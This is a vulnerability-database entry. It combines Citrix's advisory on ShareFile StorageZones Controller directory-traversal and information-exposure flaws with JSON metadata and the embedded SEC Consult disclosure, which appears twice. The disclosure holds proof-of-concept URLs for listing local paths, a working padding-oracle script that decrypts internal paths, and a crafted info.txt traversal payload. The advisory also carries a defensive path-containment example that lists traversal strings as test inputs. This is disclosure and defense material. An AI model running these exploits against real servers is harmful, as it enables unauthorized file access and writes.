<section class="article-content" data-swapid="ArticleContent">
<div class="content-block" data-swapid="ContentBlock"><div>
<div>
<h2> Description of Problem</h2>
<div>
<div>
<div>
<p>Two security issues have been identified within Citrix ShareFile StorageZones Controller that, if exploited, could allow a compromised or malicious ShareFile user to write arbitrary files as that Active Directory user to the local file system, and also to discover the full local file system paths of shared files to which the ShareFile user has access.</p>
<p>These issues affect all currently supported versions of Citrix ShareFile StorageZones Controller before version 5.4.2.</p>
<p>The following issues have been addressed:</p>
<ul>
<li>CVE-2018-16968 (Medium): Citrix ShareFile StorageZones Controller before 5.4.2 allows Directory Traversal</li>
<li>CVE-2018-16969 (Low): Citrix ShareFile StorageZones Controller before 5.4.2 has Information Exposure Through an Error Message</li>
</ul>
</div>
</div>
</div>
</div>
<div>
<h2> Mitigating Factors</h2>
<div>
<div>
<div>
<p>These issues require a compromised or malicious ShareFile user in order to exploit them. To write files, the Active Directory user account must also have local file system permissions to write files to the chosen location. To read the full path of a shared file, the ShareFile user account must also have existing permission to the shared file.</p>
</div>
</div>
</div>
</div>
<div>
<h2> What Customers Should Do</h2>
<div>
<div>
<div>
<p>A new version of the Citrix ShareFile StorageZones Controller has been released. Citrix recommends that affected customers review the risks that these issues pose to their specific deployment and upgrade in a timely manner.</p>
<p>Citrix also recommends that the StorageZones Controller be configured such that Active Directory user accounts only have permissions to read and write files within the storage path root.</p>
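<p>The recommendation above is a least-privilege control: even if a request escapes the intended directory, the Active Directory account has nothing it can write outside the storage path root. The application-side counterpart is a containment check that normalizes a requested path and refuses anything that resolves outside the configured root, including <code>..</code> segments, absolute drive paths, and the prefix pitfall where <code>\\server\share\zone1</code> is mistaken for a parent of <code>\\server\share\zone10</code>. The following is an added example written for this page, not Citrix code or the StorageZones Controller's own logic; the storage root, the <code>resolve_within_root</code>, <code>path_kind</code> and <code>authorize_path</code> names, and the <code>allow_local</code> flag are all assumptions made for the illustration. It uses Python's <code>ntpath</code> so Windows-style UNC and drive paths are handled on any platform.</p>

```python
import ntpath
from typing import Optional

# Constructed sample storage root (a UNC share); not a path from the advisory.
STORAGE_ROOT = r"\\fileserver\sharefile\zone1"


def path_kind(path: str) -> str:
    """Classify a Windows-style path as 'unc', 'drive', 'rooted' or 'relative'.

    The distinction matters because a file-serving component that treats
    \\host\share and C:\Windows the same way will happily expose local disks.
    """
    drive, _ = ntpath.splitdrive(path)
    if drive.startswith("\\\\") or drive.startswith("//"):
        return "unc"          # \\host\share\...
    if drive:
        return "drive"        # C:\... or C:relative
    if path[:1] in ("\\", "/"):
        return "rooted"       # \dir\file, relative to the current drive/share
    return "relative"


def resolve_within_root(root: str, requested: str) -> Optional[str]:
    """Join `requested` to `root` and return the normalized path, or None if it escapes.

    Only relative requests are accepted; anything carrying its own drive or UNC
    prefix is rejected before joining, and the joined result is normalized so
    '..' segments and forward slashes are collapsed before the containment test.
    """
    if ntpath.splitdrive(requested)[0] or ntpath.isabs(requested):
        return None  # caller supplied an absolute/drive path: never join these
    root_n = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normpath(ntpath.join(root, requested))
    cand_n = ntpath.normcase(candidate)
    # Compare against the root with a trailing separator so that
    # "...\zone1" is not accepted as a prefix of "...\zone10".
    if cand_n == root_n or cand_n.startswith(root_n.rstrip("\\") + "\\"):
        return candidate
    return None


def authorize_path(root: str, requested: str, allow_local: bool = False) -> Optional[str]:
    """Policy wrapper: by default only UNC roots are served, never local drives.

    `allow_local` stands in for a deliberate administrator decision to expose a
    local path; the default mirrors the "network paths only" posture.
    """
    if not allow_local and path_kind(root) != "unc":
        return None
    return resolve_within_root(root, requested)


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the rest escape attempts.
    samples = [
        r"docs\report.pdf",
        r"..\dest_dir\testfile.txt",
        r"C:\Windows\System32\drivers\etc\hosts",
        r"..\zone10\x.txt",
    ]
    for req in samples:
        print(f"{req!r:45} -> {authorize_path(STORAGE_ROOT, req)}")
```

<p>Note that a request such as <code>../../zone1/ok.txt</code> is accepted because after normalization it lands back inside the root; the check enforces where a path ends up, not which characters it contains. A deployment that wants to treat any <code>..</code> segment as suspicious can add that as a separate rejection rule on top of this containment test.</p>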
<p>The StorageZones Controller can be downloaded at the following location: <a href="https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html">https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html</a></p>
</div>
</div>
</div>
</div>
<div>
<h2> Acknowledgements</h2>
<div>
<div>
<div>
<p>Citrix thanks Wolfgang Ettlinger of SEC Consult Vulnerability Lab (<a href="http://www.sec-consult.com/">http://www.sec-consult.com/</a>) for working with us to protect Citrix customers.</p>
</div>
</div>
</div>
</div>
<div>
<h2> What Citrix Is Doing</h2>
<div>
<div>
<div>
<div>
<div>
<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <a href="http://support.citrix.com/">http://support.citrix.com/</a>.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<div>
<h2> Obtaining Support on This Issue</h2>
<div>
<div>
<div>
<div>
<div>
<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <a href="https://www.citrix.com/support/open-a-support-case.html">https://www.citrix.com/support/open-a-support-case.html</a>.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<div>
<h2> Reporting Security Vulnerabilities</h2>
<div>
<div>
<div>
<div>
<div>
<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 – <a href="http://support.citrix.com/article/CTX081743">Reporting Security Issues to Citrix</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<div>
<h2> Changelog</h2>
<div>
<div>
<div>
<table width="100%">
<tbody>
<tr>
<td colspan="1" rowspan="1">Date </td>
<td colspan="1" rowspan="1">Change</td>
</tr>
<tr>
<td colspan="1" rowspan="1">19th September 2018</td>
<td colspan="1" rowspan="1">Initial publishing</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div></div>
</section>
{"id": "CTX238022", "type": "citrix", "bulletinFamily": "software", "title": "Citrix ShareFile StorageZones Controller Multiple Security Updates", "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Description of Problem</h2>\n<div>\n<div>\n<div>\n<p>Two security issues have been identified within Citrix ShareFile StorageZones Controller that, if exploited, could allow a compromised or malicious ShareFile user to write arbitrary files as that Active Directory user to the local file system, and also to discover the full local file system paths of shared files to which the ShareFile user has access.</p>\n<p>These issues affect all currently supported versions of Citrix ShareFile StorageZones Controller before version 5.4.2.</p>\n<p>The following issues have been addressed:</p>\n<p>\u2022 CVE-2018-16968 (Medium): Citrix ShareFile StorageZones Controller before 5.4.2 allows Directory Traversal</p>\n<p>\u2022 CVE-2018-16969 (Low): Citrix ShareFile StorageZones Controller before 5.4.2 has Information Exposure Through an Error Message</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Mitigating Factors</h2>\n<div>\n<div>\n<div>\n<p>These issues require a compromised or malicious ShareFile user in order to exploit them. To write files, the Active Directory user account must also have local file system permissions to write files to the chosen location. To read the full path of a shared file, the ShareFile user account must also have existing permission to the shared file.</p>\n<p> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Customers Should Do</h2>\n<div>\n<div>\n<div>\n<p>A new version of the Citrix ShareFile StorageZones Controller has been released. 
Citrix recommends that affected customers review the risks that these issues pose to their specific deployment and upgrade in a timely manner.</p>\n<p>Citrix also recommends that the StorageZones Controller be configured such that Active Directory user accounts only have permissions to read and write files within the storage path root.</p>\n<p>The StorageZones controller can be downloaded at the following location: <a href=\"https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html\">https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html</a></p>\n<p> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Acknowledgements</h2>\n<div>\n<div>\n<div>\n<p>Citrix thanks Wolfgang Ettlinger of SEC Consult Vulnerability Lab (<a href=\"http://www.sec-consult.com/\">http://www.sec-consult.com/</a>) for working with us to protect Citrix customers.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix Is Doing</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. 
For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">Date </td>\n<td colspan=\"1\" rowspan=\"1\">Change</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">19th September 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Initial publishing</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "published": "2020-11-09T09:09:01", "modified": "2018-09-19T04:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://support.citrix.com/article/CTX238022", "reporter": "Citrix", "references": [], "cvelist": ["CVE-2018-16968", "CVE-2018-16969"], "lastseen": "2021-01-19T22:28:14", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16968", "CVE-2018-16969"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149570"]}, {"type": "zdt", "idList": ["1337DAY-ID-31198"]}], "rev": 4}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-16968", "CVE-2018-16969"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149570"]}, {"type": "zdt", "idList": ["1337DAY-ID-31198"]}]}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": 
"MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "edition": 2, "scheme": null, "_state": {"dependencies": 1645901830, "score": 1659842276}, "_internal": {"score_hash": "61b3b0101fbce318ec5bbd7b898a3352"}}
{"zdt": [{"lastseen": "2018-10-02T14:25:37", "description": "Citrix StorageZones Controller versions prior to 5.4.2 suffer from padding oracle, improper access restriction, and path traversal vulnerabilities.", "cvss3": {}, "published": "2018-09-27T00:00:00", "type": "zdt", "title": "Citrix StorageZones Controller Improper Access Restrictions / Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-16969", "CVE-2018-16968"], "modified": "2018-09-27T00:00:00", "id": "1337DAY-ID-31198", "href": "https://0day.today/exploit/description/31198", "sourceData": "=======================================================================\r\n title: Multiple Vulnerabilities\r\n product: Citrix StorageZones Controller\r\n vulnerable version: all versions before 5.4.2\r\n fixed version: 5.4.2\r\n CVE number: CVE-2018-16968, CVE-2018-16969\r\n impact: Medium\r\n homepage: https://www.citrix.com/\r\n found: 2018-08\r\n by: W. Ettlinger (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n\r\n An integrated part of SEC Consult\r\n Europe | Asia | North America\r\n\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\n\"ShareFile is a file sharing service that enables users to easily and securely\r\nexchange documents. ShareFile Enterprise provides enterprise-class service and\r\nincludes StorageZones Controller and the User Management Tool. ShareFile\r\nStorageZones Controller extends the ShareFile software as a service (SaaS)\r\ncloud storage by providing your ShareFile account with private data storage,\r\nreferred to as StorageZones for ShareFile Data. 
[...].\"\r\n\r\nURL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nUsers of this product are advised to install the security patch provided by Citrix.\r\n\r\nThe vulnerabilities identified suggest that no sufficient technical security\r\naudit has yet been conducted on the Citrix StorageZones Controller. SEC Consult\r\nrecommends Citrix to conduct such an audit.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\nThe Citrix StorageZones Controller exposes resources that are typically only\r\navailable to the internal network (e.g. CIFS Windows shares) to clients\r\nconnecting from the Internet.\r\n\r\nIn order to hide internal network paths from the user and in order to only allow\r\naccess to paths specifically allowed by the administrator, internal network\r\npaths are encrypted. E.g. if an administrator wants to allow access to an UNC\r\npath (e.g. \\\\testhost\\testshare\\testdir) this string is encrypted and provided\r\nto the client. When the user calls the API to e.g. list the contents of this\r\ndirectory, the StorageZones Controller returns the encrypted absolute paths for\r\neach directory entry. This way, the absolute internal paths are always hidden\r\nfrom the user.\r\n\r\n1) Improper Access Restrictions\r\nCitrix StorageZone Controller offers users a functionality to convert UNC paths\r\ninto their encrypted form. Therefore, users are able to access any UNC paths\r\naccessible by the StorageZones Controller.\r\n\r\nWhen providing access to a network share, the StorageZones Controller\r\nimpersonates the user. Therefore, unauthorized access to network shares is not\r\npossible.\r\n\r\nHowever, Citrix StorageZones Controller internally does not distinguish between\r\nUNC-paths (e.g. \\\\testhost\\testshare) and local paths (e.g. C:\\Windows).\r\nTherefore, users may access (e.g. 
read, write, delete) local paths for which\r\nthey have appropriate NTFS permissions.\r\n\r\nNote: Citrix StorageZones allows an administrator to define the paths exposed by\r\nthe StorageZones Controller. By configuring this setting an administrator can\r\nrestrict access to only network paths. The configuration page incorrectly states\r\nthat a value of \"*\" (the default value) \"allows connections to all hosts on the\r\ninternal network\", while in fact it also allows access to local paths.\r\n\r\n2) Padding Oracle\r\nThe encryption mechanism used by the Citrix StorageZones Controller is\r\nvulnerable to a padding oracle attack. This allows an attacker to partly decrypt\r\nor potentially modify internal paths.\r\n\r\n3) Path Traversal\r\nThe upload functionality is vulnerable to a path traversal attack if the\r\npreconditions to exploit the vulnerability #1 are met. In practice this\r\nvulnerability has a similar effect as vulnerability #1.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Improper Access Restrictions\r\nThe following URL demonstrates how local paths can be encrypted:\r\n\r\nhttps://<host>/cifs/v3/Items/ByPath?path=c:\\\r\n\r\nThe following URL demonstrates how e.g. the contents of the directory can be\r\nlisted:\r\n\r\nhttps://<host>/cifs/v3/Items(<encrypted>)?$expand=Children\r\n\r\n\r\n2) Padding Oracle\r\nThe following script demonstrates how encrypted internal paths can partly be\r\ndecrypted. 
It may also be possible to partly modify encrypted paths (this has\r\nnot been verified).\r\n\r\n---- snip ----\r\nimport sys\r\nsys.path.append('python-paddingoracle')\r\n\r\nfrom paddingoracle import BadPaddingException, PaddingOracle, xor\r\nfrom base64 import b64encode, b64decode\r\nfrom urllib import quote, unquote\r\nimport requests\r\nimport socket\r\nimport time\r\nimport getpass\r\n\r\nURL = 'http://<host>/'\r\nAUTH = (raw_input('User: '),\r\n getpass.getpass('Password: '))\r\n\r\nCIPHER = '<encrypted path>'\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.session = requests.Session()\r\n\r\n def oracle(self, data, **kwargs):\r\n d = b64encode('B'*64 + encrypted + data)\\\r\n .replace('=', '_')\\\r\n .replace('+', '-')\\\r\n .replace('/', '!')\r\n\r\n response = self.session.get(URL + 'cifs/v3/Items('+d+')',\r\n headers={'Authorization': 'Basic '+b64encode(':'.join(AUTH))})\r\n\r\n if 'File path could not be resolved.' in response.text:\r\n print 'bad'\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n logging.basicConfig(level=logging.DEBUG)\r\n\r\n encrypted = bytearray(b64decode(CIPHER\\\r\n .replace('_', '=')\\\r\n .replace('-', '+')\\\r\n .replace('!', '/')))\r\n\r\n padbuster = PadBuster()\r\n\r\n d = b64encode(encrypted)\\\r\n .replace('=', '_')\\\r\n .replace('+', '-')\\\r\n .replace('/', '!')\r\n\r\n print padbuster.decrypt(encrypted, block_size=16, iv=bytearray(16))\r\n---- snip ----\r\n\r\n\r\n3) Path Traversal\r\nThis attack involves uploading a file called \"info.txt\" to any local path (see\r\nvulnerability #1). These info.txt files are used by StorageZones controller\r\nto keep track of ongoing file uploads (e.g. 
if a file upload is split into\r\nmultiple HTTP requests).\r\n\r\nThe following shows an info.txt file that can be used by an attacker:\r\n\r\ninfo_txt = 'ThreadedUpload|' + \\\r\n 'rsu-00000000000000000000000000000000|' + \\\r\n 'info.txt|0||00000000-0000-0000-00000000000000000|' + \\\r\n '5||False|' + \\\r\n r'..\\dest_dir\\testfile.txt|' + \\ # the temporary upload file\r\n 'False|0|0|0|False|4|apiv3||';\r\n\r\nThis value is then hashed (MD5 encoded as UTF16) and the resulting hash is\r\nappended (info_txt + '|' + hash).\r\n\r\nThis file is normally expected to be in a dedicated temporary directory. When a\r\nrequest is made in reference to an ongoing file upload, a string identifying\r\none specific upload is sent with it. When accessing the info.txt that describes\r\nthe upload, the application uses the upload id sent as a part of the file path\r\n(<tmp upload path>/<upload id>/info.txt).\r\n\r\nAn attacker can therefore conduct a directory traversal attack to reference\r\nthe previously uploaded info.txt. Any uploaded chunk that references this\r\nfile is appended to the temporary upload file (see info_txt above).\r\n\r\nThis file is created with the privileges of the user NETWORK SERVICE. 
The data\r\nis then written to it with the privileges of the attacker's account.\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe version 5.3.1.5610 of the StorageZones controller was found to be vulnerable.\r\nThis was the latest version as of the time of vulnerability discovery.\r\n\r\nAccording to the vendor, all versions before 5.4.2 are affected by the identified\r\nsecurity issues.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2018-08-08: Sending encrypted advisory to the Citrix Security Team\r\n2018-08-08: Citrix: Investigation has been started\r\n2018-09-07: Requesting status update\r\n2018-09-07: Citrix: Preliminary release date for the patch: 2018-09-19\r\n2018-09-19: Citrix releases StorageZones Controller version 5.4.2 in which these\r\n vulnerabilities are addressed\r\n2018-09-24: SEC Consult releases the security advisory\r\n\r\n\r\nSolution:\r\n---------\r\nUpgrade to the latest version available:\r\nhttps://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html\r\n\r\nThe Citrix security advisory can be found here:\r\nhttps://support.citrix.com/article/CTX238022\n\n# 0day.today [2018-10-02] #", "sourceHref": "https://0day.today/exploit/31198", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-09-27T10:12:49", "description": "", "published": "2018-09-27T00:00:00", "type": "packetstorm", "title": "Citrix StorageZones Controller Improper Access Restrictions / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16969", "CVE-2018-16968"], "modified": "2018-09-27T00:00:00", "id": "PACKETSTORM:149570", "href": "https://packetstormsecurity.com/files/149570/Citrix-StorageZones-Controller-Improper-Access-Restrictions-Traversal.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20180924-0 > \n======================================================================= \ntitle: Multiple Vulnerabilities \nproduct: 
Citrix StorageZones Controller \nvulnerable version: all versions before 5.4.2 \nfixed version: 5.4.2 \nCVE number: CVE-2018-16968, CVE-2018-16969 \nimpact: Medium \nhomepage: https://www.citrix.com/ \nfound: 2018-08 \nby: W. Ettlinger (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"ShareFile is a file sharing service that enables users to easily and securely \nexchange documents. ShareFile Enterprise provides enterprise-class service and \nincludes StorageZones Controller and the User Management Tool. ShareFile \nStorageZones Controller extends the ShareFile software as a service (SaaS) \ncloud storage by providing your ShareFile account with private data storage, \nreferred to as StorageZones for ShareFile Data. [...].\" \n \nURL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html \n \n \nBusiness recommendation: \n------------------------ \nUsers of this product are advised to install the security patch provided by Citrix. \n \nThe vulnerabilities identified suggest that no sufficient technical security \naudit has yet been conducted on the Citrix StorageZones Controller. SEC Consult \nrecommends Citrix to conduct such an audit. \n \n \nVulnerability overview/description: \n----------------------------------- \nThe Citrix StorageZones Controller exposes resources that are typically only \navailable to the internal network (e.g. CIFS Windows shares) to clients \nconnecting from the Internet. \n \nIn order to hide internal network paths from the user and in order to only allow \naccess to paths specifically allowed by the administrator, internal network \npaths are encrypted. E.g. if an administrator wants to allow access to an UNC \npath (e.g. 
\\\\testhost\\testshare\\testdir) this string is encrypted and provided \nto the client. When the user calls the API to e.g. list the contents of this \ndirectory, the StorageZones Controller returns the encrypted absolute paths for \neach directory entry. This way, the absolute internal paths are always hidden \nfrom the user. \n \n1) Improper Access Restrictions \nCitrix StorageZone Controller offers users a functionality to convert UNC paths \ninto their encrypted form. Therefore, users are able to access any UNC paths \naccessible by the StorageZones Controller. \n \nWhen providing access to a network share, the StorageZones Controller \nimpersonates the user. Therefore, unauthorized access to network shares is not \npossible. \n \nHowever, Citrix StorageZones Controller internally does not distinguish between \nUNC-paths (e.g. \\\\testhost\\testshare) and local paths (e.g. C:\\Windows). \nTherefore, users may access (e.g. read, write, delete) local paths for which \nthey have appropriate NTFS permissions. \n \nNote: Citrix StorageZones allows an administrator to define the paths exposed by \nthe StorageZones Controller. By configuring this setting an administrator can \nrestrict access to only network paths. The configuration page incorrectly states \nthat a value of \"*\" (the default value) \"allows connections to all hosts on the \ninternal network\", while in fact it also allows access to local paths. \n \n2) Padding Oracle \nThe encryption mechanism used by the Citrix StorageZones Controller is \nvulnerable to a padding oracle attack. This allows an attacker to partly decrypt \nor potentially modify internal paths. \n \n3) Path Traversal \nThe upload functionality is vulnerable to a path traversal attack if the \npreconditions to exploit the vulnerability #1 are met. In practice this \nvulnerability has a similar effect as vulnerability #1. 
\n \n \nProof of concept: \n----------------- \n1) Improper Access Restrictions \nThe following URL demonstrates how local paths can be encrypted: \n \nhttps://<host>/cifs/v3/Items/ByPath?path=c:\\ \n \nThe following URL demonstrates how e.g. the contents of the directory can be \nlisted: \n \nhttps://<host>/cifs/v3/Items(<encrypted>)?$expand=Children \n \n \n2) Padding Oracle \nThe following script demonstrates how encrypted internal paths can partly be \ndecrypted. It may also be possible to partly modify encrypted paths (this has \nnot been verified). \n \n---- snip ---- \nimport sys \nsys.path.append('python-paddingoracle') \n \nfrom paddingoracle import BadPaddingException, PaddingOracle, xor \nfrom base64 import b64encode, b64decode \nfrom urllib import quote, unquote \nimport requests \nimport socket \nimport time \nimport getpass \n \nURL = 'http://<host>/' \nAUTH = (raw_input('User: '), \ngetpass.getpass('Password: ')) \n \nCIPHER = '<encrypted path>' \n \nclass PadBuster(PaddingOracle): \ndef __init__(self, **kwargs): \nsuper(PadBuster, self).__init__(**kwargs) \nself.session = requests.Session() \n \ndef oracle(self, data, **kwargs): \nd = b64encode('B'*64 + encrypted + data)\\ \n.replace('=', '_')\\ \n.replace('+', '-')\\ \n.replace('/', '!') \n \nresponse = self.session.get(URL + 'cifs/v3/Items('+d+')', \nheaders={'Authorization': 'Basic '+b64encode(':'.join(AUTH))}) \n \nif 'File path could not be resolved.' 
in response.text: \nprint 'bad' \nraise BadPaddingException \n \nif __name__ == '__main__': \nimport logging \nlogging.basicConfig(level=logging.DEBUG) \n \nencrypted = bytearray(b64decode(CIPHER\\ \n.replace('_', '=')\\ \n.replace('-', '+')\\ \n.replace('!', '/'))) \n \npadbuster = PadBuster() \n \nd = b64encode(encrypted)\\ \n.replace('=', '_')\\ \n.replace('+', '-')\\ \n.replace('/', '!') \n \nprint padbuster.decrypt(encrypted, block_size=16, iv=bytearray(16)) \n---- snip ---- \n \n \n3) Path Traversal \nThis attack involves uploading a file called \"info.txt\" to any local path (see \nvulnerability #1). These info.txt files are used by StorageZones controller \nto keep track of ongoing file uploads (e.g. if a file upload is split into \nmultiple HTTP requests). \n \nThe following shows an info.txt file that can be used by an attacker: \n \ninfo_txt = 'ThreadedUpload|' + \\ \n'rsu-00000000000000000000000000000000|' + \\ \n'info.txt|0||00000000-0000-0000-00000000000000000|' + \\ \n'5||False|' + \\ \nr'..\\dest_dir\\testfile.txt|' + \\ # the temporary upload file \n'False|0|0|0|False|4|apiv3||'; \n \nThis value is then hashed (MD5 encoded as UTF16) and the resulting hash is \nappended (info_txt + '|' + hash). \n \nThis file is normally expected to be in a dedicated temporary directory. When a \nrequest is made in reference to an ongoing file upload, a string identifying \none specific upload is sent with it. When accessing the info.txt that describes \nthe upload, the application uses the upload id sent as a part of the file path \n(<tmp upload path>/<upload id>/info.txt). \n \nAn attacker can therefore conduct a directory traversal attack to reference \nthe previously uploaded info.txt. Any uploaded chunk that references this \nfile is appended to the temporary upload file (see info_txt above). \n \nThis file is created with the privileges of the user NETWORK SERVICE. The data \nis then written to it with the privileges of the attacker's account. 
\n \n \nVulnerable / tested versions: \n----------------------------- \nThe version 5.3.1.5610 of the StorageZones controller was found to be vulnerable. \nThis was the latest version as of the time of vulnerability discovery. \n \nAccording to the vendor, all versions before 5.4.2 are affected by the identified \nsecurity issues. \n \n \nVendor contact timeline: \n------------------------ \n2018-08-08: Sending encrypted advisory to the Citrix Security Team \n2018-08-08: Citrix: Investigation has been started \n2018-09-07: Requesting status update \n2018-09-07: Citrix: Preliminary release date for the patch: 2018-09-19 \n2018-09-19: Citrix releases StorageZones Controller version 5.4.2 in which these \nvulnerabilities are addressed \n2018-09-24: SEC Consult releases the security advisory \n \n \nSolution: \n--------- \nUpgrade to the latest version available: \nhttps://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html \n \nThe Citrix security advisory can be found here: \nhttps://support.citrix.com/article/CTX238022 \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. 
\n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF W. Ettlinger / @2018 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149570/SA-20180924-0.txt"}], "cve": [{"lastseen": "2022-03-23T14:23:43", "description": "Citrix ShareFile StorageZones Controller before 5.4.2 has Information Exposure Through an Error Message.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-09-26T21:29:00", "type": "cve", "title": "CVE-2018-16969", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 